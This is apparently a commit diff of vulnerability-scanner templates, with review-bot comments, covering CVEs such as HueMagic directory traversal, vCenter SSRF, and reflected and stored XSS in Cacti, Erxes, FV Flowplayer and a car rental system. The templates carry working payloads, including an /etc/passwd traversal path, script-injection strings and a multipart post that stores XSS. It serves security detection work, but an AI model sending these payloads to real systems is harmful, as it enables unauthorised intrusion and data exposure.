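Review bot: the first raw request is `GET /login` while the second posts to `/flightpath/index.php`, so the token extractor (`idden' name='form_token' value='([a-z0-9]+)'>`) scrapes a different path prefix than the form it feeds; confirm whether the login page really lives at `/login` on a FlightPath install or both requests should share the `/flightpath/` prefix. `severity: high` also disagrees with `cvss-score: 5.3` (CVSS 3.x rates 4.0 to 6.9 as medium); align one with the other. Minor: there is no blank line between `id:` and `info:`, unlike the other new templates here.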
@ -31,3 +31,4 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 500
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2020-18268
|
||||
|
||||
info:
|
||||
name: Z-BlogPHP 1.5.2 Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
|
||||
reference:
|
||||
- https://github.com/zblogcn/zblogphp/issues/216
|
||||
- https://www.cvedetails.com/cve/CVE-2020-18268
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-18268
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,zblogphp,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /zb_system/cmd.php?act=verify HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 81
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
|
||||
|
||||
- |
|
||||
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
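Review bot: `Content-Length: 81` is hard-coded while the body contains `{{username}}` and `{{md5("{{password}}")}}`, so the real length varies with the username; drop the header rather than fixing it to 81. The second raw request is declared `HTTP/2` while the first is `HTTP/1.1`; a raw request line cannot negotiate h2, so use HTTP/1.1. As with the other redirect templates added here, there is no status matcher alongside the Location regex.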
@ -4,7 +4,7 @@ info:
|
|||
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
|
||||
author: Ganofins
|
||||
severity: critical
|
||||
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
|
||||
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
|
||||
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
||||
tags: cve,cve2020,wordpress,wp-plugin,rce,upload
|
||||
classification:
|
||||
|
|
|
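Review bot: `description:` opens with a fragment (`WordPress wpDiscuz plugin version 7.0.4.`) that is not a sentence; fold it into the next one, e.g. `WordPress wpDiscuz plugin 7.0.4 allowed unauthenticated attackers to upload arbitrary files, including PHP files, and achieve remote code execution on the site's server.`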
@ -29,9 +29,9 @@ requests:
|
|||
- "Contact Form 7"
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- '^== Changelog =="'
|
||||
- type: word
|
||||
words:
|
||||
- '== Changelog =='
|
||||
part: body
|
||||
|
||||
- type: regex
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2020-36365
|
||||
|
||||
info:
|
||||
name: Smartstore < 4.1.0 - Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
|
||||
reference:
|
||||
- https://github.com/smartstore/SmartStoreNET/issues/2113
|
||||
- https://www.cvedetails.com/cve/CVE-2020-36365
|
||||
- https://github.com/smartstore/SmartStoreNET
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-36365
|
||||
cwe-id: CWE-601
|
||||
metadata:
|
||||
shodan-query: http.html:'content="Smartstore'
|
||||
tags: cve,cve2020,redirect,smartstore
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
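Review bot: the description names four open-redirect sinks (`CommonController.ClearCache`, `ClearDatabaseCache`, `RestartApplication`, `ScheduleTaskController.Edit`) but the template only requests `/backend/admin/common/clearcache?previousUrl=...`; either add the other paths or narrow the description to what is tested, and `RestartApplication` in particular should not be probed by a scanner. There is also a stray blank line between `- method: GET` and `path:`, and no status matcher next to the Location regex.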
@ -4,7 +4,7 @@ info:
|
|||
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
|
||||
author: gy741
|
||||
severity: high
|
||||
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
|
||||
description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
|
||||
reference:
|
||||
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
|
||||
tags: cve,cve2020,cacti,rce,oast
|
||||
|
|
|
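Review bot: the description is still phrased as exploit instructions (`you can just use the following code to exploit the vulnerability`) and refers to code that is not in the template; rewrite it as a statement of the flaw, e.g. that the RCE is reachable without authentication when the `Guest Realtime Graphs` privilege is enabled. The reference URL itself says `authenticated-remote-code-execution`, which should be reconciled with the unauthenticated claim.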
@ -0,0 +1,38 @@
|
|||
id: CVE-2021-21973
|
||||
|
||||
info:
|
||||
name: VMware vCenter Unauthenticated SSRF
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21973
|
||||
- https://twitter.com/osama_hroot/status/1365586206982082560
|
||||
- https://twitter.com/bytehx343/status/1486582542807420928
|
||||
tags: cve,cve2021,vmware,ssrf,vcenter,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-21973
|
||||
cwe-id: CWE-918
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Vcip: {{interactsh-url}}
|
||||
Vcpassword: {{rand_base(6)}}
|
||||
Vcusername: {{rand_base(6)}}
|
||||
Reqresource: {{rand_base(6)}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "The server sent HTTP status code 200"
|
|
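Review bot: detection hinges on `status: 500` plus the body text `The server sent HTTP status code 200`, i.e. on the plugin reporting what the interactsh endpoint returned; since `Vcip: {{interactsh-url}}` is already used and the template is tagged `oast`, add a matcher on `part: interactsh_protocol` with `words: - "http"` so the callback itself is the evidence, and the body text becomes a secondary signal that survives a wording change in the plugin error.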
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-24838
|
||||
|
||||
info:
|
||||
name: AnyComment <= 0.2.21 - Open Redirect
|
||||
author: noobexploiter
|
||||
severity: medium
|
||||
description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
|
||||
tags: wordpress,wp-plugin,open-redirect
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-24838
|
||||
cwe-id: CWE-601
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
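Review bot: `tags: wordpress,wp-plugin,open-redirect` is missing `cve,cve2021` and uses `open-redirect` where the other redirect templates in this commit use `redirect`; the tag list feeds the TAG counts in the TOP-10 table above and the ignore list, so keep it consistent. The description's `which according to the vendor, is a feature` is worth keeping, since it tells users not to expect a fix.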
@ -0,0 +1,34 @@
|
|||
id: CVE-2021-25864
|
||||
|
||||
info:
|
||||
name: Hue Magic - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
|
||||
reference:
|
||||
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
|
||||
- https://www.cvedetails.com/cve/CVE-2021-25864
|
||||
metadata:
|
||||
shodan-query: title:"NODE-RED"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-25864
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,huemagic,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
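Review bot: the description has a typo, "Directory Traversal.in the res.sendFile API" is missing a space and a sentence break after "Traversal". Suggest "... is affected by a directory traversal (hue/assets/..%2F) in the res.sendFile API used in hue-magic.js, allowing an arbitrary file to be fetched." For consistency with the other templates here, the second reference could also point at the NVD entry for CVE-2021-25864 rather than cvedetails.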
@ -4,7 +4,7 @@ info:
|
|||
author: dhiyaneshDk,philippedelteil
|
||||
severity: critical
|
||||
name: Confluence Server OGNL injection - RCE
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
tags: cve,cve2021,rce,confluence,injection,ognl
|
||||
reference:
|
||||
- https://jira.atlassian.com/browse/CONFSERVER-67940
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-26247
|
||||
|
||||
info:
|
||||
name: Unauthenticated XSS Cacti - auth_changepassword.php
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26247
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-26247
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,cacti,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"></script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
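Review bot: `reference:` is a single scalar here while every other template in this commit uses a list (`reference:` followed by `- https://...`); make it a list so it matches the schema the indexer expects. The description is also the NVD text written as an instruction ("As an unauthenticated remote user, visit ..."); rewording it as a statement of the flaw (the `ref` parameter of auth_changepassword.php is reflected unescaped, allowing reflected XSS without authentication) reads better in the info block, and the name would fit the "Product - Vulnerability" convention as "Cacti - Unauthenticated Reflected XSS (auth_changepassword.php)".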
@ -1,12 +1,17 @@
|
|||
id: CVE-2021-29156
|
||||
|
||||
info:
|
||||
name: LDAP Injection In Openam
|
||||
name: LDAP Injection In OpenAM
|
||||
author: melbadry9,xelkomy
|
||||
severity: high
|
||||
tags: cve,cve2021,openam,ldap,injection
|
||||
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
|
||||
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
|
||||
description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
|
||||
remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
|
||||
reference:
|
||||
https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md
|
||||
https://hackerone.com/reports/1278050
|
||||
https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
|
||||
https://portswigger.net/research/hidden-oauth-attack-vectors
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
|
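Review bot: the four lines under the new `reference:` key have no `- ` list markers, unlike the reference lists elsewhere in this commit, so YAML will fold them into one multi-line plain scalar ("https://github.com/sullo/... https://hackerone.com/reports/1278050 ...") rather than four references. Prefix each URL with `- `. Separately, the new description asserts "Enumeration can allow for full password retrieval", which is a stronger claim than the reset-token behaviour the rest of the sentence describes; if that is what the references show, fine, otherwise soften it to user enumeration.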
@ -24,3 +29,5 @@ requests:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "jato.pageSession") && status_code==200'
|
||||
|
||||
# Enhanced by cs on 2022/01/24
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-32682
|
||||
|
||||
info:
|
||||
name: elFinder - Multiple vulnerabilities leading to RCE
|
||||
author: smaranchand
|
||||
severity: critical
|
||||
tags: cve,cve2021,elfinder,misconfig,rce,oss
|
||||
description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
|
||||
reference:
|
||||
- https://smaranchand.com.np/2022/01/organization-vendor-application-security/
|
||||
- https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
|
||||
- https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-32682
|
||||
remediation: Update to elFinder 2.1.59
|
||||
metadata:
|
||||
github: https://github.com/Studio-42/elFinder
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-32682
|
||||
cwe-id: CWE-22,CWE-78,CWE-918
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html"
|
||||
- "{{BaseURL}}/assets/elFinder/elfinder.html"
|
||||
- "{{BaseURL}}/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html"
|
||||
- "{{BaseURL}}/uploads/elfinder/elfinder-cke.html"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "elfinder"
|
||||
- "php/connector"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
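Review bot: the matchers only confirm that an elFinder page referencing `php/connector` is reachable; nothing checks for version 2.1.58 or earlier, so patched 2.1.59+ installs will be reported as `critical` CVE-2021-32682 as well. Either add an extractor for the version string (the path list already shows one versioned directory, `/assets/elFinder-2.1.9/`) or state in the description that this template detects an exposed elFinder connector and does not verify the vulnerable version.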
@ -0,0 +1,36 @@
|
|||
id: CVE-2021-32853
|
||||
|
||||
info:
|
||||
name: Erxes <= v0.23.0 XSS
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3285
|
||||
metadata:
|
||||
shodan-query: http.title:"erxes"
|
||||
tags: cve,cve2021,xss,erxes,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'topic_id: "</script><script>alert(document.domain)</script>'
|
||||
- "window.erxesEnv"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
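Review bot: the NVD reference URL points at CVE-2021-3285, which does not match the template id `CVE-2021-32853`; it should read `https://nvd.nist.gov/vuln/detail/CVE-2021-32853`. The description is also missing a space after "cross-site scripting.The value", and, unlike the other CVE templates in this commit, there is no `classification` block with `cve-id` and `cwe-id`.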
@ -13,7 +13,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-38314
|
||||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
|
||||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-39350
|
||||
|
||||
info:
|
||||
name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected XSS
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-39350
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
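Review bot: the request line `GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1` carries raw `<` and `>` characters; proxies and many servers reject or mangle unencoded angle brackets in the request target. Percent-encode the payload in the URL as the Cacti and AppCMS templates in this commit do (`%3C%2Fscript%3E%3Cscript%3E...`); the body word matcher keeps checking for the decoded reflection.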
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-40960
|
||||
|
||||
info:
|
||||
name: Galera WebTemplate 1.0 – Directory Traversal
|
||||
name: Galera WebTemplate 1.0 Directory Traversal
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2021-45380
|
||||
|
||||
info:
|
||||
name: AppCMS - Reflected Cross-Site Scripting (XSS)
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
|
||||
reference:
|
||||
- https://github.com/source-trace/appcms/issues/8
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
|
||||
tags: cve,cve2021,appcms,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-45380
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '""></script><script>alert(document.domain)</script>'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
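Review bot: `condition: and` under the body word matcher is a no-op because the `words` list has a single entry; drop it. In the description, "has a XSS injection vulnerability in \templates\m\inc_head.php" should read "has a reflected XSS vulnerability in /templates/m/inc_head.php" (article, and forward slashes matching the request path).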
@ -0,0 +1,111 @@
|
|||
id: CVE-2021-46005
|
||||
|
||||
info:
|
||||
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/49546
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2021-46005
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,xss,sourcecodester,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /admin/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
|
||||
username={{username}}&password={{password}}&login=
|
||||
|
||||
- |
|
||||
POST /admin/post-avehical.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="vehicletitle"
|
||||
|
||||
Test
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="brandname"
|
||||
|
||||
1
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="vehicalorcview"
|
||||
|
||||
</script><script>alert(document.domain)</script>
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="priceperday"
|
||||
|
||||
500
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="fueltype"
|
||||
|
||||
Petrol
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="modelyear"
|
||||
|
||||
2022
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="seatingcapacity"
|
||||
|
||||
5
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img1"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img2"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img3"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img4"; filename="test.png"
|
||||
Content-Type: image/png
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="img5"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
|
||||
------WebKitFormBoundarypWqYipqU21aYgccv--
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
